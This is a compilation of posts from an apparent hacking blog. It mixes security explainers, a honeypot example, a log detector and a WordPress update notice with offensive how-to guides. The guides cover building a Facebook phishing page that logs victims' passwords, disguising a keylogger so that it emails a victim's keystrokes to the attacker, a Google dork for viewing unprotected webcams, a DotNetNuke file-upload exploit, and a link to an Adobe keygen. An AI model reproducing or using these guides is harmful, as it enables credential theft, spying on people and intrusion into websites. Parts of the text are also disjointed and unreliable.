Hakin9 is an e-magazine that covers ethical hacking and security issues. I just came across its website, Hakin9.org, and had a look at some of the magazines. They were awesome, so I thought I would share it here on RHA. This month's issue is about Cybercrime and Cyberwar Predictions for 2011 and covers the following topics:
Cybercrime and Cyberwar Predictions for 2011
The Social Web Threat
Pros and cons of partial passwords in web applications
Target Attacks via Email
Spyware Threat Invades BlackBerry App World
And Much more
So what are you waiting for? Go ahead and download the Hakin9 magazine for January here.
2010 has been a wonderful year here on RHA (Rafay Hacking Articles). We wish all of our readers a very happy 2011. The year 2010 has been really amazing in terms of traffic and revenue too: we doubled our daily traffic, and the revenue generated from the blog doubled as well. I wrote my first book on ethical hacking, "A Beginners Guide To Ethical Hacking", and got interviewed.
Goals For 2011
I have lots of goals for 2011 and some of them are as Follows:
Black hat hacking is the term given to breaking into the security system of a computer to get access to its network connectivity without the knowledge of the authorized party. As long as internet connectivity is used for message transactions and information storage, black hat hackers can be expected to play their role of hacking secure private data. There are a variety of hacking tips and techniques that each hacker exploits in trying to crack system security, and there are also certain software applications that make the hacking process easier. Black hat hackers also work on psychological factors to pry out the passwords and user IDs of a system. Security exposure is one of the unfortunate and obvious parts of computing today.
Black hat tips and techniques
Black hat briefings brings together a team of legislative body from federal organization along with a set of professional and expertise hackers towards a conference on keeping up computer security. Black hat briefings and trainings are being provided from specific vendors who work upon neutralizing the vendor conferencing.
Black hat cloaking is a search engine optimization approach in which the data passed to the search engine spider differs from what is sent to the user's browser. It is performed based on the User-Agent HTTP header of whoever requests the page. The rationale of black hat cloaking is to trick the search engine into displaying the page when it would otherwise not be displayed.
OllyDbg and IDA Pro are effective hacker tools for debugging, generally used to analyze and sort out code. OllyDbg is limited to 32-bit files, while IDA Pro can work on 32-bit as well as 64-bit files.
Usually a computer system, phone or network is hacked for a malevolent motive such as fraud involving credit cards and identity cards, piracy, or theft of data from secure systems. Jonathan James, Adrian Lamo and Kevin Mitnick hold the top places for perfect hacking technique.
Both the black hat hackers and white hat crackers come up with similar pattern of cracking the system’s security to make their job done. In a hacker tool box one can find various tools that are being utilized in hacking course of time as they discover and utilize the network with special softwares to overturn a series of coding.
Author bio
Corliss Jennica, The author of this article has got keen knowledge on bringing out various issues related to the black hat hackers technique. Feel free to contact her on further hacking tips and guidance on computer system security.
Recently I wrote on article on How To Spy and Hack a webcam I received a very good response from readers, However in this article I will show you how to use a simple Google Dork to access unprotected webcams online.There are thousands of unprotected webcams available online, Since many Webcams use known protocols to transmit live video streams over the web, it's often very easy to search for publicly accessible webcams 1.First of all open your Internet browser and visit Google.com
2.Search on Google for the following Keyword "inurl:/view.index.shtml"
3. Next Choose a webcam and Enjoy
Google Dorks
Here is the list of Few Google Dorks used for this purpose:
Adobe Illustrator CS5 software provides precision and power with sophisticated drawing tools, expressive natural brushes, a host of time-savers, and integration with Adobe CS Live online services.I have posted lots of articles on Adobe Photoshop CS5 Serial keys and Adobe CS5 Keygens but lots of people were looking for adobe CS5 Illustrator serial keys instead of Adobe Photoshop CS5 keys, So in this post I am posting a download link to the adobe CS5 Illustrator keygens
In this post I will tell you how you can hack the Facebook chat application to run it from any window. Using this hack you will be able to chat with your friends while on other browser pages. So here is the step-by-step guide to hack the Facebook chat application.
Note: This trick to hack the Facebook chat application works for the Firefox browser only.
1. First of all, log into your Facebook account.
4. Next, click on the bookmark option at the top beside the history button, right-click Facebook chat at the bottom, check "Load this bookmark in the sidebar" and click OK.
Now you can load Facebook chat application from any browser
The first thing any hacker does to compromise a network is gather information passively and look for vulnerable services and ports. This is where honeypots come in, playing the role of a fake vulnerability in the network. Honeypots are fake in theory, but not in practice: they are real vulnerabilities in the network, intentionally kept open and designed to gather information about the possible attack or attacker.
How Do Honeypots Work?
This fake vulnerability attracts a hacker, who will try to compromise it. The honeypot itself stores data about how the hacker is trying to break it, what tools he might be using, his intentions, keystrokes and many such things.
This information is useful to the network security administrator in many ways. Generally an attack is not done in one shot. Hackers try some initial attacks and, based on the results, hack into major network flaws after some days.
So honeypots help security people secure their networks using the information gathered from the initial attack. They are called honeypots only because they are made available in a network of vulnerabilities, like a honeycomb.
Are Honeypots Themselves Vulnerable?
Sure they are. There are a lot of smart-ass hackers who, if they somehow come to know that they are dealing with a honeypot, can totally screw things up.
This is because they are actually dealing with a system file in the network, so they are already inside it without any breakdown. If they can compromise this fake vulnerability, i.e. the honeypot, they can surely break into the system in less time.
A vulnerability is a vulnerability after all, and honeypots are too. But there is only a very rare chance of an attacker identifying one, and doing so needs great experience. So planting a honeypot in a network architecture makes for a more secure scenario for any host or network.
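The recording behaviour described above, as an added example that is not part of the original guest post: a low-interaction decoy listener that presents a fake service banner and stores who connected and the first bytes they sent. The banner, function names and the loopback round trip in `demo()` are assumptions made for illustration.

```python
import socket
import threading
from datetime import datetime, timezone

# Constructed decoy banner; there is no real service behind it.
BANNER = b"220 FTP server ready\r\n"

def make_listener(host="127.0.0.1", port=0):
    """Bind the decoy port. Port 0 lets the OS pick a free one (used by demo())."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    sock.listen(5)
    return sock

def serve(sock, events, max_conns=1, timeout=2.0):
    """Accept max_conns connections and record source address and first bytes."""
    for _ in range(max_conns):
        conn, (ip, src_port) = sock.accept()
        with conn:
            conn.settimeout(timeout)
            data = b""
            try:
                conn.sendall(BANNER)
                data = conn.recv(1024)   # stored only, never parsed or executed
            except OSError:
                pass                     # client closed early or sent nothing
            events.append({
                "time": datetime.now(timezone.utc).isoformat(),
                "src_ip": ip,
                "src_port": src_port,
                "first_bytes": data,
            })
    sock.close()

def demo():
    """Loopback round trip: one constructed client connects and sends a line."""
    events = []
    listener = make_listener()
    port = listener.getsockname()[1]
    worker = threading.Thread(target=serve, args=(listener, events))
    worker.start()
    with socket.create_connection(("127.0.0.1", port), timeout=2.0) as client:
        client.recv(64)                       # read the decoy banner
        client.sendall(b"USER admin\r\n")     # constructed sample input
    worker.join()
    return events

if __name__ == "__main__":
    for event in demo():
        print(event)
```

Because nothing legitimate should ever connect to the decoy port, every recorded event is worth an administrator's attention.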
About The Author
Amol wagh is a tech blogger and an Ethical hacker, He writes at his blog Hackersengima, If you are interested in writing a guest post on your blog kindly read the guidelines here
We are happy to announce that we will also cover a bit of hacking and security related news. So if you get any latest security related news, kindly send it to us via our contact form. Your full name will be published along with your news.
Article Format
Title
Description
Proper article with Images(If any)
Name of the Sender
If you come across any latest hacking or security related announcements or news, kindly send them to us via our contact form.
In this tutorial I will tell you how hackers use a simple DotNetNuke exploit to hack a website. The exploit I am talking about is found in hundreds and hundreds of DNN applications, and it allows the hacker to upload an image to your server. This type of attack is also called one-way hacking, and at the end of the article I have also posted some countermeasures to help you defend yourself against these kinds of attacks. You might be interested in reading some related posts at RHA:
A google dork is an act of using google provided search terms to obtain a specific resultand this DNN vulnerability occurs only in those websites which have "/portals/0" in their navigation, So goahead and search for inurl:”/portals/0″ where inurl asks the google to display all the url's who have /portals/0 in their navigation
1.Lets say the vulnerable website is:
www.vulnerablewebsite.com/portals/0
2.Now we will just add Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx after the url so www.vulnerablewebsite.com/portals/0 will become www.vulnerablewebsite.com/portals/0Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
3.Now a website is vulnerable to this type of attack you will get a similar windows like the below one:
4.Next enter the following Javascript in the address bar: javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
What this javascript will do is that it will enable us to upload our image to the server:
5.The hacker could upload any image on victims website.
Countermeasures
1. The easiest method is to rename your fcklinkgallery file to something else. This will not prevent the attack, but it does protect you from script kiddies; a skilled hacker can easily find the renamed file using footprinting methods.
2. Another way to prevent this attack is to upgrade to IIS 7 or higher and a DNN version of 4.9.4 or higher.
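A detection check to go with the countermeasures above, as an added example that is not part of the original tutorial: it scans an IIS W3C log for requests to the Fck provider directory, so a renamed gallery page is still reported. The log lines are constructed sample data and the function names are hypothetical.

```python
from collections import defaultdict

# Provider directory named in the tutorial, lower-cased for matching.
FCK_DIR = "providers/htmleditorproviders/fck/"

# Constructed sample in IIS W3C extended format (documentation IP ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2011-01-04 10:01:11 GET /Default.aspx - 198.51.100.7 Mozilla/5.0 200
2011-01-04 10:02:40 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.50 Mozilla/5.0 200
2011-01-04 10:02:58 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.50 Mozilla/5.0 200
2011-01-04 10:05:02 GET /providers/htmleditorproviders/fck/FCKLINKGALLERY.ASPX - 192.0.2.9 Mozilla/5.0 404
this line is truncated
"""

def parse_w3c(text):
    """Yield one dict per request line, using the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            # Skip truncated or malformed lines instead of mis-assigning columns.
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def find_fck_requests(text):
    """Summarise, per client IP, requests to .aspx pages in the Fck provider directory."""
    hits = defaultdict(lambda: {"GET": 0, "POST": 0, "post_ok": False})
    for row in parse_w3c(text):
        stem = row.get("cs-uri-stem", "").lower()
        if FCK_DIR not in stem or not stem.endswith(".aspx"):
            continue
        method = row.get("cs-method", "").upper()
        entry = hits[row.get("c-ip", "?")]
        if method in ("GET", "POST"):
            entry[method] += 1
        # A POST answered with 2xx means the page accepted a postback.
        if method == "POST" and row.get("sc-status", "").startswith("2"):
            entry["post_ok"] = True
    return dict(hits)

if __name__ == "__main__":
    for ip, summary in find_fck_requests(SAMPLE_LOG).items():
        print(ip, summary)
```

A client with `post_ok` set is the one to investigate first, starting with a review of recently created files under the portal's upload folders.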
Feel free to ask if you have any kind of problem with anything mentioned in this tutorial.
Have you accidentally deleted photos from your hard disk? Do you want to recover them? Then you don't need to panic. It is possible to recover photos even if you have deleted them from the Recycle Bin. In this post you will find information on how to recover photos on Windows or Mac. Today there exist hundreds of photo recovery tools. I have personally tested over 20 of them; some could not recover photos in their original condition, and others were not capable of recovering deleted photos at all.
So it is very important to make the right choice of photo recovery software in order to recover deleted photos in their original condition. We recommend the following software to recover the deleted files:
Stellar Phoenix is one of the best companies specializing in deleted file recovery services and solutions since 1993.
What are the Chances of Recovering my Photos Back?
Since the operating system does not immediately reuse the space occupied by deleted photos or files, it is certainly possible to recover photos in their original condition. The only condition is to act as early as possible, before the hard disk reuses the deleted space.
Recovering Deleted Photos
In order to recover deleted photos, all you need to do is run a scan, and the software will search for deleted photos. These digital photo recovery utilities are built with a highly interactive user interface that makes them easy to understand without prior photo recovery experience. Loss of pictures from the storage media can occur under the following circumstances:
1. Pulling out the memory card without switching the camera off
2. Accidentally deleting the photographs
3. Formatting the computer hard drive or memory card
4. Corruption or damage of the storage device
5. Corruption or damage of the file system of your computer system
6. Turning off the digital camera during a write process
Visit the following links for more information on Stellar Data Recovery:
Your IP is exposed whenever you visit a website. When your IP gets exposed, it becomes easy to trace you and find out your personal information. Hackers can use your IP to gain access to your personal files and documents, and can even get into your paypal, alert etc. accounts. Real IP hide is software that masks your IP with one click so you can surf the web anonymously. On the other hand, hackers can use this software to hide their identity and not get caught. It is beneficial for all, and I recommend that every PC should have this software installed.
Features
Key Features
Easily Conceal Your IP Address
Anonymous Web Surfing
Advanced Application Support
Protect Your Identity and Stop Hackers
Un-ban Yourself From Forums, Blogs, Etc...
Prevent websites from tracking your online activities
Quickly delete all Internet Explorer and FireFox cookies
Are you curious to "hack facebook password" well then this post is just for you, Most people ask me to tell them the easiest way to hack facebook password, so here are some ways to that hackers take to hack facebook password:
1.Facebook phishing 2.Keylogging 3.Facebook new features 4.virus See my article on 4 ways on how to hack a facebook password for information on the above methods But today we will focus on a method which has a high success rate celled Phishing and keylogging,so first of all:
What is phishing?
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.
Phishing Procedure:
First of all downloadFacebook fake login page (Complete the survey to unlock Facebook fake login page)
1.once you have downloded facebook fake login page now extract contents in a folder
2.Now open pass.php and find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your to is the 'http://www.google.com.pk'
Note:'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com' instead of "http://rafayhackingarticles.blogspot.com"
Now Save it .
3.Now open facebook fake page in a wordpad
4.Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com,www.ripway.com or t35.com.
Note:Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can useooowebhost.
6.Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored
7.Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !
How it works?
When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his Facebook.com password hacked
Keylogging - Easy way:
The easiest way and best way to hack Facebook is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers,below i will show you on How to hack facebook passwords with winspy and sniperspy
1. Sniper Spy (Remote Install Supported)
SniperSpyis the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access! Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel! This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands.
2. After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
.user - type in the victim’s name .file name - Name the file to be sent. Use the name such that victim will love to accept it. .file icon - keep it the same .picture - select the picture you want to apply to the keylogger. In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.
If you are a Beginner and are interested in learn Hacking from beginning I recommend you reading my book on Ethical hacking "A beginners Guide To Ethical hacking"
Subscribe to our blog and get Facebook Hacking updates,To subscribe click on the button below,dont forgot to click the activation link in your email box
Recently I wrote about Firesheep, a Firefox plugin, in my post Firesheep makes Facebook Hacking easy. It uses a sidejacking or session hijacking attack to access a Facebook account on a WiFi network. In this tutorial I will tell you about an awesome Firefox addon which can be used to detect Firesheep on your network to keep it safe. The addon I am talking about is known as "Blacksheep". Its code is almost the same as Firesheep's; the only difference is that it is used for security purposes. If someone is using Firesheep on your network, you can detect it easily with Blacksheep. It pops up an image like the one below if someone is using Firesheep on your network.
Note: Blacksheep won't protect against sidejacking or session hijacking done by Firesheep; it can only detect whether someone is using Firesheep on your network.
How to install and use blacksheep?
Here is a video which shows how to use Blacksheep to detect firesheep on your network:
An intrusion detection system (IDS) is used to monitor the entire network. It detects intruders, that is, unexpected, unwanted or unauthorized people or programs on the network. An intrusion detection system has a number of sensors that are used to detect unwanted or unexpected flows of network traffic. The major sensors are as follows:
A sensor that monitors log files
A sensor that monitors incoming or outgoing TCP connections
How Does an Intrusion Detection System Work?
An intrusion detection system works by collecting information and then examining it. The IDS collects data from its sensors and analyzes this data to notify the system administrator about malicious activity on the network.
An intrusion detection system can be run manually, but most IT administrators find it easier to automate the system checks to ensure that nothing is accidentally overlooked.
We can mainly categorize an IDS into two types:
There is still a question: why use an IDS if there is a firewall to perform these tasks? A firewall is used to stop unwanted traffic from entering or leaving the internal enterprise network, whereas the IDS is deployed to monitor traffic in vital segments of the network, generating alerts when an intrusion is detected.
A firewall has holes to let things through; without them you wouldn't be able to access the Internet or send or receive emails. There are different ways to bypass or cheat a firewall. Snort is an excellent open source network intrusion detection system, and OSSEC is an open source host-based intrusion detection system.
Below is an overview of the basic architecture, as well as practical examples of how to customize an open source host-based intrusion detection system to manage logging from your infrastructure and applications.
About The Author
This is a guest post written by Irfan Shakeel. The author is an Ethical Hacker and Internet searcher and blogs at http://www.beautyofthebaud.co.cc/
Three days back the President of Pakistan's website was hacked by a hacker called "Adil" from Pak cyber army. It was restored in 2 days according to the officials. I just heard news that the hacker Adil (real name Shahbaz) has been arrested today in Rawalpindi. The court has handed Shahbaz to the FIA crime wing on three days' remand. The hacker Shahbaz told the FIA that he had done it just for fun.
The FIA crime wing has also contacted Interpol to inquire about Indian hackers who are responsible for hacking Pakistani websites.
How was the website Hacked?
I am not really sure what method the hacker used to deface the website, but I am pretty confident that the hacker would have used simple SQL injection to gain access to the control panel. SQL injection can easily be avoided by putting some checks in the code. For more information on what methods hackers use to hack a website, and the countermeasures, kindly read my article Common methods to hack a website.
WordPress has just released its newest version, 3.0.2, fixing a critical security flaw in WordPress 3.0.1. The new version fixes a security issue which allowed Author-level users to gain further access to the website. WordPress has not yet mentioned what type of vulnerability was found. All we know is that blogs with multiple authors are vulnerable to this type of attack, so make sure that you update as soon as possible.
Here is the official statement by wordpress:
WordPress 3.0.2 is available and is a mandatory security update for all previous WordPress versions. Haiku has become traditional:
Fixed on day zero
One-click update makes you safe
This used to be hard
This maintenance release fixes a moderate security issue that could allow a malicious Author-level user to gain further access to the site, addresses a handful of bugs, and provides some additional security enhancements. Big thanks to Vladimir Kolesnikov for detailed and responsible disclosure of the security issue!
Download 3.0.2 or update automatically from the Dashboard > Updates menu in your site's admin area. You should update immediately even if you do not have untrusted users.